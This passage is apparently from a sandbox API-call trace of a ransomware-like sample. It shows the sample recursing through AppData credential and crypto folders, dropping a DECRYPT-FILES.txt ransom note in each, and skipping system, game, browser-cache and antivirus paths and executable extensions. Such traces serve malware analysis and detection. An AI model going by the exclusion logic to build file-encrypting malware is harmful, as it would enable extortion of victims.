lpString2="..") returned 0 [0087.970] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.970] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.970] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.970] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.970] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.970] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.970] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.970] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.970] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.970] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned 55 [0087.970] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.970] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\" [0087.970] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp" [0087.971] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.971] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Credentials\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\credentials\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.971] CloseHandle (hObject=0x0) returned 0 [0087.971] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.971] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0087.971] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0087.971] CloseHandle (hObject=0x438) returned 1 [0087.971] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0087.971] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1 [0087.971] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1 [0087.971] lstrcatW (in: lpString1="Crypto", lpString2="\\" | out: lpString1="Crypto\\") returned="Crypto\\" [0087.971] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\", lpString2="Crypto\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\" [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Program Files") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch=":\\Windows") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Games\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\All Users") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="AhnLab") returned 0x0 [0087.972] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.972] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0087.972] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.972] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\jkbimi8.tmp") returned 62 [0087.972] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0087.973] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0087.973] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.973] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt") returned 68 [0087.973] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0087.974] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0087.975] CloseHandle (hObject=0x43c) returned 1 [0087.975] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0087.975] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0087.975] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b58 [0087.975] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.975] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.975] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.975] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.975] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.975] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.975] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.975] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.975] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.975] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.975] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.975] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.975] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.976] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned 50 [0087.976] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.976] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\" [0087.976] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp" [0087.976] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.976] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.976] CloseHandle (hObject=0x0) returned 0 [0087.976] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.976] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0087.976] lstrcmpW (lpString1="RSA", lpString2=".") returned 1 [0087.976] lstrcmpW (lpString1="RSA", lpString2="..") returned 1 [0087.976] lstrcatW (in: lpString1="RSA", lpString2="\\" | out: lpString1="RSA\\") returned="RSA\\" [0087.976] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\", lpString2="RSA\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0087.976] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Program Files") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch=":\\Windows") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Games\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\All Users") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="AhnLab") returned 0x0 [0087.977] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.977] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0087.977] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.977] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\jkbimi8.tmp") returned 66 [0087.977] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0087.977] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0087.977] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.977] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt") returned 72 [0087.978] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0087.978] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0087.979] CloseHandle (hObject=0x444) returned 1 [0087.979] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0087.979] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0087.979] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0087.979] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.979] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.979] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.979] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.979] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.979] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.979] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.979] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.980] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.980] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.980] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.980] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.980] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.980] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.980] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.980] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned 54 [0087.980] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.980] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\" [0087.980] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp" [0087.980] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.980] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.980] CloseHandle (hObject=0x0) returned 0 [0087.980] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.981] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0a1b400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0a1b400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0a1b400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0087.981] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0087.981] CloseHandle (hObject=0x440) returned 1 [0087.981] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, 